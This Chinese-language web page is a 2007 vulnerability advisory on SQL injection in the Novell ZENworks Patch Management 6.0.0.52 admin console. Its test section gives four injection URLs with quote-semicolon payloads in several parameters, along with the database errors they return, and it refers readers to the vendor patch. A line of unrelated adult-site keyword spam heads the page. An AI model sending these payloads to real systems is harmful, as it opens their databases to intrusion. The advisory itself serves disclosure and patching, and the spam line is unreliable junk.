亚洲成精品动漫久久精久,九九在线精品视频播放,黄色成人免费观看,三级成人影院,久碰久,四虎成人欧美精品在永久在线

掃一掃
關(guān)注微信公眾號(hào)

Novell ZENworks補(bǔ)丁管理SQL注入漏洞
2007-02-06   

受影響系統(tǒng):

Novell ZENworks Patch Managemen 6.0.0.52

不受影響系統(tǒng):

Novell ZENworks Patch Managemen 6.2

描述:

BUGTRAQ ID: 15220

Novell的ZENworks組件允許組織從SuSE Linux平臺(tái)管理Windows工作站,Patch Management是其中用于管理補(bǔ)丁的組件。ZENworks Patch Management的管理控制臺(tái)中存在多個(gè)SQL注入漏洞,遠(yuǎn)程攻擊者可以完全入侵基礎(chǔ)數(shù)據(jù)庫(kù)系統(tǒng)。但如果要利用這個(gè)漏洞,管理員應(yīng)至少手動(dòng)創(chuàng)建了一個(gè)非特權(quán)用戶帳號(hào)。

測(cè)試方法: 

http://192.168.1.10/computers/default.asp?sort=&Direction=';
Response from server: Incorrect syntax near ', @RecsPerPage=100, @FirstRec=0, @Action=0, 
@Search = ', @groupFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=';StatusFilter=ERRR&computerFilter=187&impactFilter=29&saveFilter=save
&Page=rep
Response from server: Incorrecy syntax near ', @delimiter='.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=CIRT.DK&StatusFilter=';&computerFilter=187&impactFilter=29&saveFilter=
save&Page=rep
Response from server: Incorrect syntax near ', @groupFilter = ', @ImpactFilter = '.

http://192.168.1.10/reports/default.asp?sort=[ReportImpact_Name]
&Dir=asc&SearchText=CIRT.DK&StatusFilter=ERRR&computerFilter=';&impactFilter=29&saveFilter
=save&Page=rep
Response from server: Line 1: Incorrect syntax near ', @Contact_ID='.

建議:

廠商補(bǔ)丁:

Novell

目前廠商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問題,請(qǐng)到廠商的主頁(yè)下載:


熱詞搜索:

上一篇:黑客攻擊行為的特征分析及反攻擊技術(shù)
下一篇:利用ORACLE系統(tǒng)賬戶默認(rèn)口令提升權(quán)限

分享到: 收藏